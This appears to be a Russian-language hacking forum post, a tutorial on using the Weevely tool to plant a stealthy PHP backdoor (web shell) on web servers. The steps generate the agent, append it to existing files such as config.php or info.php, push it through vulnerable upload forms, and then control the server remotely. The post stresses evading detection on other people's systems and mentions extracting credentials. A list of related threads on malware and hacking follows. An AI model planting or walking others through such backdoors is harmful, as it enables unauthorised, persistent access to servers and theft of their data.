Вставка бэкдора на PHP вебсайтах с Weevely

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Очень удобно оставлять после себя бэкдоры, если вы однажды уже смогли найти путь на сервер, и они смогут пригодиться в большом количестве случаев. Они хороши для разработчиков, которые хотят иметь быстрый доступ к машинам, на которых они работают, или для системных администраторов, которым нужен такой же доступ. Также, безусловно, бэкдоры являются лучшими друзьями хакеров и могут быть добавлены множеством способов. Одним хорошим инструментом для этого является Weevely, который использует отрезок PHP кода.

Weevely создает терминал на целевой машине и позволяет действовать удаленному коду через небольшой след PHP агента. Он включает в себя более 30 модулей для административных и технических нужд, а также разрешение расширения и даже сетевое радиальное смещение. Подумайте о тех аккаунтах, что вы используете, которые блокируют ваш доступ – здесь это может пригодиться, также как и на других серверах, на которые вам удалось просочиться.

В данном руководстве, мы будем брать это за основу на нашем локальном хосте. Вы можете следовать этому, или запустить его на другом сервере, где вы сможете сделать с ним намного больше.



Step 1 Скачиваем Weevely
Weevely может быть встроен в некоторые версии Linux, например, Kali. Если он не установлен на вашей системе Linux, вы можете найти 3 версию на Epinna's GitHub page. Чтобы установить его на стандартный Linux distro, есть множество способов сделать это, включая Git, HTTP, и wget.

Код:
wget https://github.com/epinna/weevely3/archive/master.zip

Step 2 Создание фрагмента PHP
Не имеет значение, как вы установили Weevely, убедитесь, что у вас есть терминал или окно оболочки, открытое в директории содержащей файл master.zip. Предположим, что вы скачали его в папку Downloads, перейдем в нее, распакуем файлы, перейдите в папку с распакованными файлами и просмотрите ее содержимое.

Код:
cd Downloads
unzip master.zip
cd weevely3-master/
ls
Вам нужно запустить установочный файл weevely.py отдельно для того, чтобы понять то, о чем мы говорим здесь, потому что скрипт требует особого синтаксиса, и вы можете узнать о нем здесь.
Код:
./weevely.py


3fe58005f134a9d83f37a.png

В нашем примере, мы будем использовать опцию "Generate backdoor agent". Пусть наш пароль будет следующим pazzWurD, и назовем путь нашего PHP файла backdoor.php. Мы должны получить файл под названием backdoor.php в той же директории, где мы работаем.

Обратите внимание, что backdoor.php не является хорошим именем для вашего PHP файла. Это всего лишь пример. Вы не хотите привлекать много внимания к тому, что вы делаете, поэтому убедитесь, что вы заменили название файлов "mypassword" и "myfilename.php" на что-то менее очевидное.

Код:
./weevely.py generate mypassword myfilename.php

7320f1b8b5d2ac9f24c22.png

Step 3 Вставка вашего Backdoor
Теперь, вооружившись новым PHP скриптом (в нашем случае это backdoor.php), мы можем рассмотреть несколько способов его применения. Сначала, если у вас есть доступ к серверу вы можете просто скопировать/вставить содержимое вашего PHP файла в другой доступный PHP файл на сервере. Например, в config.php или settings.php файлы, которые вы можете там найти. Сначала, я скопирую содержимое моего backdoor.php скрипта в текстовом редакторе.

788dbc53c3d1e21f4517b.png

Затем, я вставлю целый блок кода PHP внизу всего остального PHP кода в файле запущенном на моем сервере. Здесь, я вставляю его внизу всего в файле info.php на моем сервере. Мне пришлось использовать Vi редактор на моем сервере.

83c3f8f1ecc1e5330bc0c.png

Мой info.php продолжает работать в обычном режиме, но скрипт, указанный ниже, продолжает оставаться неизменным до обращения к нему

Другая вещь, которую вам следует попробовать, это найти уязвимый сайт с возможностью загрузки на него информации – свойство, которое позволяет вам делиться файлами или изображениями. Сделайте это, получить ссылку на ваш файл и вы в деле.

94e00d3cfa3f3c44a2f50.png

Большинство сайтов, как этот, будет блокировать загрузку скриптов, но не каждый сайт является совершенным.

Как бы вы это ни сделали, вы хотите поместить ваш backdoor.php файл — или содержимое вашего PHP файла — в другой PHP файл, на каком-то локальном или удаленном сервере.



Step 4 Доступ к вашему бэкдору
Первое, что вы можете заметить в Weevely это то, что ваш backdoor.php файл, запущенный в веб-директории или в конце другого PHP файла, ничего не делает и не показывает в вашем браузере. И это хорошо! Если бы ваш файл отображался на сайте, он был бы сразу замечен и подправлен, или даже использован кем-либо еще, а нам этого совсем не нужно.

7750cbba65f5db77c656b.png

Что нам нужно, так это снова открыть файл weevely.py на нашей системе, только в этот раз мы не будем создавать файл с ним – мы используем его, чтобы указать место, куда мы посетим созданный ранее скрипт. На моем локальном хосте с моими файлами, это выглядит так:

Код:
./weevely.py http://localhost/info.php pazzWurD
Если Вы не тестируете это с локального хоста, это выглядит чем-то подобным:
Код:
./weevely.py http://some.websitename.com/myfilename.php mypassword

Так или иначе, используйте Weevely, чтобы вызвать ваш файл, и вы увидите следующий ответ:

7597ea87073a69de5fceb.png

Просто напечатайте: help, и это покажет вам все, что вы можете делать из этой позиции.

В Weevely встроены дополнительные 30 модулей, так что существует множество моментов для работы. Например, file_ls делает точно то, что вы подумали, а file_cp может позволить вам скопировать файл, как только вы разработаете пути от и до, как на локальной системе. Вы сможете получить все сразу при помощи file_tar, затем используйте cp, чтобы получить много материалов для чтения.

Есть несколько путей увеличить ваши права в Weevely, так что если у вас есть расширенные права на сервере, вы можете делать практически все с ним. Вы сможете получить несколько ключей на вашей целевой системе с audit_password. Не забывайте оставаться внизу здесь, чтобы сохранить ваше время и силы, если вы не можете разобраться с вашей собственной системой, и чтобы остаться незамеченным в чужой системе.

Устранение проблем
Возникали ли у вас ошибки во время выполнения этих упражнений? Я работал на новой системе, так что пока я распаковывал директорию master.zip, и смотрел файлы, которые она содержит, я не мог получить Weevely's Python скрипт, для корректного запуска. Если у вас подобная ситуация и вы видите следующее:

Код:
ImportError: No module named prettytable
Сделайте что-то вроде следующего, замещая имя модуля, того чего не хватает:

Код:
$ sudo apt install python-prettytable
 
Похожие темы
Support81 Продавцы Anom признались в распространении бэкдора ФБР Новости в сети 0
Support81 0day в WPS Office: как обычный документ становится плацдармом для запуска бэкдора SpyGlace Новости в сети 0
Support81 Новое направление языка Nim: распространение бэкдора для шпионажа Новости в сети 0
Eteriass Интересно Клинет-сервер на Python3 на примере бэкдора Полезные статьи 5
Admin Способы загрузки шелла/бэкдора на сайт Уязвимости и взлом 0
Admin Интересно «Верните деньги, или мы идём в полицию». CrossCurve дала похитителям ровно 72 часа на возврат крипты. Новости в сети 0
Admin Интересно Читы, локеры и 110 заблокированных доменов. Группировка NyashTeam прячется за вывеской «Легиона» и продолжает охоту на геймеров. Новости в сети 0
Admin Статья Нетипичная змея. Реверсим приложение на Python c кастомным интерпретатором Вирусология 0
Admin Статья Пишем свой простейший дроппер на плюсах Вирусология 0
Admin Статья Пишем свой лоадер на плюсах - теория Вирусология 0
Admin Интересно Второй раз — это уже традиция. Антивирус eScan снова поймали на «сотрудничестве» с хакерами. Новости в сети 0
Admin Интересно Хакер думал, что украл пароль, а на самом деле – позвонил в полицию. На GitHub учат, как развести взломщика на эмоции (и логи). Новости в сети 0
Admin Интересно Четверть биткоина за «квантовые мозги». Рассказываем, как поднять крипту на знании физики. Новости в сети 0
Admin Интересно DynoWiper против польского света. Рассказываем историю самой мощной хакерской атаки на инфраструктуру страны за последние годы. Новости в сети 0
Admin Интересно Apple и OpenAI создают ИИ-жучки — микрофоны и камеры на теле будут слушать и снимать вас 24/7. Новости в сети 0
Admin Интересно Кликнули на файл «Задание_для_бухгалтера.txt»? Поздравляем — троян-шпион уже ворует ваши пароли. Новости в сети 0
Admin Статья Как на основе ФИО, даты рождения и района получить номер паспорта и ИНН. OSINT 0
Admin Статья Поднимаем личный VPN-сервер за 30 мин на своем VPS через Amnezia VPN Анонимность и приватность 0
Admin Разделение почты на Python по доменам Скрипты 0
Admin Интересно «Отдай мастер-пароль, или всё удалим!». Как хакеры берут на мушку пользователей LastPass. Новости в сети 0
Admin Статья Стеганография на примере Steghide Полезные статьи 0
Admin Интересно Ретро-хакинг на максималках. Почему ваша корпоративная сеть до сих пор думает, что на дворе девяностые. Новости в сети 0
Admin Статья Разработка малвари на С++. Глава II Вирусология 0
Admin Статья Разработка малвари на С++. Глава 1. Вирусология 0
Admin Статья Обход пароля на iphone Уязвимости и взлом 0
Admin Статья DDoS на Bluetooth. Разбираем трюк, который поможет отключить чужую колонку Полезные статьи 0
Admin Статья Взлом wi-fi на легке Полезные статьи 0
Admin Статья Полное Руководство по Google Dorks: Говорим с Поисковиком на Его Языке OSINT 0
Admin Интересно «Ваш пароль истекает» (на самом деле нет). Microsoft объясняет, почему нельзя верить даже письмам от собственного HR. Новости в сети 0
Admin Интересно Эксплойт уже на GitHub. Главная система защиты Cisco снова пробита. Новости в сети 0
Admin Интересно ZIP-архив и скрытый MSBuild. Из чего состоит новая атака на военных, которую пропустили антивирусы. Новости в сети 0
Admin Статья Право на root. Как повышают привилегии в Linux. Уязвимости и взлом 0
Admin Интересно 70000 пострадавших и 20 миллионов на кону – начались первые аресты по делу о предательстве в Coinbase. Новости в сети 0
Admin Статья Браузерные расширения — идеальный шпион: Стиллер паролей на JavaScript, который невозможно заметить Вирусология 0
Admin Интересно Казалось, что летим, а на деле — ползём. Как ИИ-помощники незаметно крадут время у профессиональных кодеров. Новости в сети 0
Admin Интересно Цифровое чудо на Рождество. Как ученым удалось восстановить UNIX V4 с ленты 1970-х годов. Новости в сети 0
Admin Интересно 0 на VirusTotal и root-доступ: хакеры смогли обмануть все антивирусы с помощью легального софта для админов. Новости в сети 0
Admin Статья Полное Руководство по Google Dorks: Говорим с Поисковиком на Его Языке OSINT 0
Admin Интересно Firebox рвут на куски прямо сейчас — критическая дыра топит корпоративные сети без пароля и удалённо. Новости в сети 0
Admin Статья XSS от Яндекс на обед Полезные статьи 0
Admin Интересно Код на GitHub, который хакеры хотели бы удалить – Agentic Threat Hunting Framework уже в сети. Новости в сети 0
Admin Интересно Ваш компьютер вам врёт: в BIOS написано «защищено», а на деле — заходи, кто хочет. Новости в сети 0
Admin Статья Сбор информации в Instagram с Osintgram на Kali Linux. OSINT 0
Emilio_Gaviriya Работа на Пабло Эскобара. Возрождение. Предоставляю работу. Ищу специалиста. 0
el_hacker Статья Удобная анонимность на практике. Анонимность и приватность 0
el_hacker Интересно Компрометированные учетные данные IAM используются для масштабной кампании по майнингу криптовалюты на AWS. Новости в сети 0
turbion0 Мошенничество на 11 миллионов рублей: в Красноярске арестовали звезд сборной России по санному спорту Новости в сети 0
Support81 Вы отключали Cloudflare во время сбоя? Срочно проверьте логи на предмет взлома Новости в сети 0
Support81 Этичный хакинг? Забудьте. США готовят рои ИИ-агентов для атаки на Китай Новости в сети 0
Support81 Один взлом — минус ВВП: убытки после атаки на JLR стали главной причиной замедления экономиики Великобритании Новости в сети 0

Название темы